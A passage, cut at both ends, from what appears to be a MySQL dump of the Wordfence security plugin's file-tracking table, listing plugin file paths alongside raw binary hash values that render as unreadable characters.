ΤO`[','',0,'?'),('7\"妿W\rѽ','wp-content/plugins/wordfence/lib/menu_wordfence_central.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nՆKvOԜ\'\0','^{A荗.Fخ\"m)>T','',0,'?'),('@ȯ&Oo','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9eb\0PO','_ujP-KOAܫ','',0,'?'),('kU/^ ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d:ǽ	X̩TI','IS:3+̢$i_if:A','',0,'?'),('HC)C','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yK\nu@x','Aݶ݁;_|sȤ4_)zaKQEe!','',0,'?'),('e-RȉL:','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-n(֟5> a.\'','j^!yfӳucwWx','',0,'?'),('i/pEt\nl','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5oQ4)dT','Dt3v\Z%jlf%O)&&1L','',0,'?'),('F{A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۍQꅳ9','!D#D\"0zt6IHԆ\\0̈\Zd','',0,'?'),('M~^x;','wp-content/plugins/wordfence/lib/unknownFiles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n✚o\"* b','p}\'5HZ%[*:^^i','',0,'?'),('LR7QToG|{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@lM3JtOF@','[`\\pǣTb>=PivO','',0,'?'),('ٵ\nhJxdvԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EGůL[o','lg_iċrY2d','',0,'?'),('2]hqu:T6EU','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cx3v@Q$)g\r','kBhl%ܟGa=R @Ξ{','',0,'?'),('Ɇ8pŻѵV','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>	[\Z᷎x4','+|\Z#*NθBND]|\0','',0,'?'),('zoܲ~b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\r4X.','lvl	](W7+0-','',0,'?'),('Ni~	`WE','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']5+6.ZM.','7ɟSYPW	OXxy*ieHY','',0,'?'),('ދ1Fa','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'Fbaۆₑ1ʤ/','n2q8D-AR>xqYq$ ш','',0,'?'),('-=QCwtnL#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\re.b','HznO#/tɚ\"U Ai','',0,'?'),('XJp','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TQxj','1YTЈqW6݋h	','',0,'?'),('1]M|KFZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6&Ph;.','PZba;pĽ)\Zn°~','',0,'?'),('ґ-\r{,','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿsy','|uIPwh5ڎ.m\"*n_ 9JP','',0,'?'),('hJD㰗G n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ăa\\F','!)-5%xi=F$07~\n','',0,'?'),('Z4<n?e','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ό̰Wڙ0E5C','.YtR`~}tsQ*x','',0,'?'),('8ÛZEQ$}UPT','wp-content/plugins/wordfence/lib/wfCrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1铇ܙ~\rm','%&9	/DXG؞߇U4','',0,'?'),('ڥ^i$&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']BjL4.;','mf%fIOF̽&FFŵs','',0,'?'),('xβЦA	<','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YZ\r<H','a\0zLn[ԶO\r%JppR\"','',0,'?'),('J^\Z7uGk+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P_<-1__Iu','%dd_\01@TY$A','',0,'?'),('ikmCxʷ','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&4.','U0@\0\'21k^ͅEi.E','',0,'?'),('7ruF@J,','wp-content/plugins/wordfence/lib/wfDateLocalization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4K_J2Cmcͭt','Djy,Lwa <U S','',0,'?'),('l9=h,>&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Jm95d','u۶eTlTrά	WTb}#','',0,'?'),('F\ZC1P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y LZ!bEl','.{0Je{5-~[T$Ğ','',0,'?'),('A0ff` Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_\Zxuv','u;IVa[~㵭TZ\\^yJj','',0,'?'),('q5@*=&\\X','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';!ȍ4QX#','չ%-^qUqMeY','',0,'?'),('PM\ZI̸ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OVFaDV44ܪ','2-7na5A>cִ\ZNA-p{Qn\Z','',0,'?'),('ikCT,','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϝq,ؾ\\','5%v_E[P3w,=s$bF','',0,'?'),('1ϣI','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HM.','ƌZ>2ì<\rsJ2*','',0,'?'),('jsw2pqS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rcq׽1(/Y','˻!i	ϾH^6XO\r,`','',0,'?'),('(>f0\Zg[|','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}{ jNcK','0mhN`xx~HLjsOP,','',0,'?'),('ؠ]fP','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i1EqE<UB','nmo6}x9>,>kYuuś','',0,'?'),('w+\"+$^','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':c\"RH@','.)ۓ,8D68bE9\'fO5Xý','',0,'?'),('\\h RX<C','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߅w@LOR','EFjrč;s΀.f:ϤF','',0,'?'),('w:k@DiWQ','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oIƷkb','7.ݰ̿UL>\"TM5]>','',0,'?'),('tǱ%F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2(dhVD','SaYgj+| JM8','',0,'?'),('+3pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	,#\r+','h]*?Y\\!rfyExQ[q=','',0,'?'),('TоR\'{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%kyiMO*','X(30\r\n\nPE̠ 9','',0,'?'),('mqPoD0*L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\8H mi+','++Ɵ0͂b=[㜁','',0,'?'),('ތt+\\+XaZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','»ÁVD','g4<2²vE{ێA05qQL','',0,'?'),('6XԪ4[_=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qf<rdr0|','th3A7\06^q(Oکz','',0,'?'),('bHzfWgw','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O@	|O','gvK%oiS7.]siH2:p','',0,'?'),('K2;<Dkub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s1_ek2R','j颎_c6323օ]Gs}.\n','',0,'?'),('sk6/н','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S(bq;:','5DZ-RHN%ے,FNm.a̽K=0','',0,'?'),('hLJHX#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6]u})e',':%ozN]	&4U','',0,'?'),('e\\1tƋ<	','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\Z@Xg	kv{t','\Zެ%)I0P?CHk@rMzlH` F','',0,'?'),('Q49LzJ','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YȫIȟ(jO','=qKo\Z\'Bc.9do','',0,'?'),('@GteY\\\'>O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\Zyh[*[ǥ','q\rzչ4kÛ>ڌj\'$a9]\n','',0,'?'),('eŐnA','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⇲*!P\'|%\Z','\0+FoL (\\.w g{&:όH','',0,'?'),('v{Cҧ4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ֿYCA4|p','{30pDr%#Mz_ϔK}Ao6MR','',0,'?'),('ݡ=NxK`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qWA\Zǧ-e\r','u&7tpQ{g{W:	!z5mYOp','',0,'?'),('kHm1`0ѹ_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ĢߞeHQ','g{!)ߔlfYڱV\"pz dN','',0,'?'),('X-4J_3','wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z7H}C])Qt7T','-c4Ēx\rqmJD5 OM','',0,'?'),('z|*6S\\53','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F:;|EO','L	w\0`2nbô\n','',0,'?'),('h<]OpNCƴ','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=[͜\'[7}t','LjT?{\0?4#hW9','',0,'?'),('Jl1','wp-content/plugins/wordfence/models/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('`&%eFgd','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','znK_','7Y.ڔn!ڒ\Ze','',0,'?'),('j4-O ՄrL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$1D\'wm','E&&\na~b+\Z)jMpM','',0,'?'),('֔ߚy(qDw','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YJs@jrjtm','3ÑѲs\r&z=dspJx3w','',0,'?'),('g]e!^(PK','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2T}HW\'<}\\','Z¥|sS8e3Eؗ$ܜ-h','',0,'?'),('X~Vzl!_]/-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\\fG݉R','b4g챔Fadm)D=@g','',0,'?'),('9XU7z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tbo i%HXwXv','ƅ1h/jw<U\\kq%s|W6','',0,'?'),('O܎$8Je','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*F6Ѷ~','}}\nN\'`ib|\r-','',0,'?'),(',:3չC@~','wp-content/plugins/wordfence/modules/login-security/classes/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aabvr','C\'r9@Kކtw#@k','',0,'?'),('@={&}_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?o','f떟;(L7rzBGޙB','',0,'?'),('/-TǻT<S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-\ruZE:	','^<1t>SM_3k!$','',0,'?'),('\ZO3F5K;@ ','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@q\\}[','[TnEjd($:!hΝ\0s><','',0,'?'),('@qG-$|','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gPʋi[','DeJ\Zfxb	x\'P:U','',0,'?'),('p\\*e\n\rψ','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_̨VX#v','t3\"àQ/!bD(O&6t','',0,'?'),('Vrz(nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y״>UɆ','Ru\Z`\\6ÃMR\r3Z!C|s,P{','',0,'?'),('SCi1ۭj','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\\E(i','4O+oc.`_U>8','',0,'?'),('{4.##','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nʆwqF','R	j[8ح͸WEH̅aI','',0,'?'),('ȁ#/\06','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4ӹu;P','aD,ǭ+vFe\"+!1t','',0,'?'),('&	Ytz(\Z','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\0*	[','f8\'!RFL˙^w','',0,'?'),('HCTp(^l','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٣gR 3','}{cV\"z9NY8JW','',0,'?'),('L\Z|=c','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0oǔ','7/QƐՐwg:?#{sɟ','',0,'?'),('S	g	Nd','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nXv^u','f.]!W\"sU.ZlAoʞh@','',0,'?'),('Wx\ZTa7{','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G|s,=K#','6ly6ɦi3U,E[鲓9','',0,'?'),('o1iL5z$7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u1\\8;#j-','P|l_Z3z<NɧK','',0,'?'),('%w45X泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t^I\']!','Ǧbt5fckdm','',0,'?'),('.7fw9Pm@','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0H#IHD','voVYx?\n\n&3c-\r8m','',0,'?'),('w@IeRf7','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hR','=mH/\neC3u58','',0,'?'),('t[[=6u7;YT','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{pf5>}6\\','7ԁcϐny@/3\'_','',0,'?'),('\rz@_ÐmdM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','96f;0','mgc%i\ZnAB@wFz;y`\rN','',0,'?'),('rY\0S(z|','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':9rKI(Nv(','oVfZ|*.\rc&8jr7`','',0,'?'),('cp	PU3/','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM,~/r','F;W]&z~o\'/q+','',0,'?'),('2p)tI','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \0\">y>=','xVQ/}琾:(3&%UJoC','',0,'?'),('ǖd!s<XЯ','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1{,˾ʂ','<G$U+kL>\0hahBS-','',0,'?'),('-_mq+1','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲ieɡ','IHMp\\Nh\n׈NF=-Z=hO','',0,'?'),('-6Yw@i=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OhO<FҬ','PJHtNsnd*F\'WWaq]','',0,'?'),('H)jHj','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\'BlIf\"c','O$U?\nRyV=TZ','',0,'?'),('g\Z\\\r`=m','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\rL{ǀ','VZ+&\rЩU;L)R!ӵ','',0,'?'),('U.G\0h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ǲ겊T','s׷my([~MNԘ;i','',0,'?'),(';DthEG>H','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\\','Zm$zpuCVgIgIN','',0,'?'),('#:SkU{','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:?l]u','2P탚=w=7Ar\nfQ~,B','',0,'?'),(']#:\';Ær/','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-SH1@kQұ','^H2m<LAm	NG)Iw:D','',0,'?'),('R.Өh7P%\Z','wp-content/plugins/wordfence/modules/login-security/css/admin.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e9 n&w21','?jӵlrhZs/','',0,'?'),('y\\-A/kͳ\n','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<w\ri컎vL*x','Nb\r̎/?+\'bi\'W$@i\0','',0,'?'),('Nk;0@IHCT\'','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N2J娳YB瘱','\ZPL㨒ZitA7d','',0,'?'),('7aQˇe֗','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ƣٿc;z','NJs@3	:h)7K<\\N+','',0,'?'),('9橷p\r%[','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AMA@|','u\ZӚ1!b \"0SBȓ>rEk','',0,'?'),('M\np6a0Qr','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l.(KpQ','ٍ$rb=phxK5]8QRjn4','',0,'?'),('Pҡekqt0.VK','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')/4;$۔ެvi\\','ni뗅NvX7Y]D','',0,'?'),('hwֺl(<','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kXZb5','[\0NEggdq\r*\'I','',0,'?'),('(HRs','wp-content/plugins/wordfence/modules/login-security/css/login.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m᳀2rmV','rJ]s682!\ZpG','',0,'?'),('ow*\nΛ΢GҜ]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]j-','8#̄(8O\"	+h\"Fb','',0,'?'),('}CwXTC','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m]a\\$','Ǘh?S):i@h.Xg','',0,'?'),('\\1݃%VE|<N','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:m𙗣P','j*edoX~7&N9|L','',0,'?'),('E?tB9bvF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'2p\nKX','Ύ%XŖF1s;Lzr璻','',0,'?'),('%fW	P0}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]j-','8#̄(8O\"	+h\"Fb','',0,'?'),('MzŭY','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GJu;QZ6','\\MUKhQwCiVJ\'','',0,'?'),('f rp(p$','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pbD@pG+','*DZ>Bg&YY4(</','',0,'?'),('Jլ4\rn','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\c7yxгl','~qV*\'1]3^m','',0,'?'),('s4RX>O','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h^n=(&݂N&','SDIBz_-?(YpEyƹA','',0,'?'),('H%,','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%;wQ8@','wi>6Ƭ4.NC\Z4IO','',0,'?'),('b0݀>j\"G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$2J','/#?TiOLyvuTKɤ\\ػ','',0,'?'),('hqz#.nkH','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LgD5w\'|IGV5','}њ@PF)M$jp{e','',0,'?'),('CC59]D$','wp-content/plugins/wordfence/modules/login-security/js/admin.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Q5\Z*yy!s','J\"qUKa\'1_NXG`揧W>','',0,'?'),('0P$\\Z;з/','wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89\"zzVv*]','ۆ%%l:Jf<bqPPt˯}ߝ\"f','',0,'?'),(';8B:冓','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lYZiਆ3\02[','(A#F~+FghS.b','',0,'?'),('uԾSҭ','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lWeU{9','G8=\0> 3wg3.4','',0,'?'),('!fj,jv(','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԹXp`me<','wP\0pzuYDSz(WߥP3$S','',0,'?'),('*&Kkz![','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\}\"7ڷDZ','.IH\Zg\0H!7`gޠZzȄž6|','',0,'?'),('8PMn+ĵ','wp-content/plugins/wordfence/modules/login-security/js/login.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tt^jhw[_[\'\Z',']D\rg,\\@{,','',0,'?'),('dtS0[\\Og:','wp-content/plugins/wordfence/modules/login-security/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aabvr','C\'r9@Kކtw#@k','',0,'?'),('@~}cQ\'J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%9;%mM6Z','6-2Xjݒ[lÆL	\'8FJ','',0,'?'),('jp\0Z','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸ\rܚ','-ͤE[G4/`rV','',0,'?'),('#ynہ彐[hr\\U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OAO~ᣯL0','	=\Z*9@*y}\0\'sZSo(','',0,'?'),('4#հ}','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/D\rmb y_','$+;f7{O/gp~','',0,'?'),('O潼m$݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1z¶~pQ.)!\\','or[AR~~Gu߰QNZk\0QSeO','',0,'?'),('#\' ~/zF','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XZ\\h=95','.Z2~b8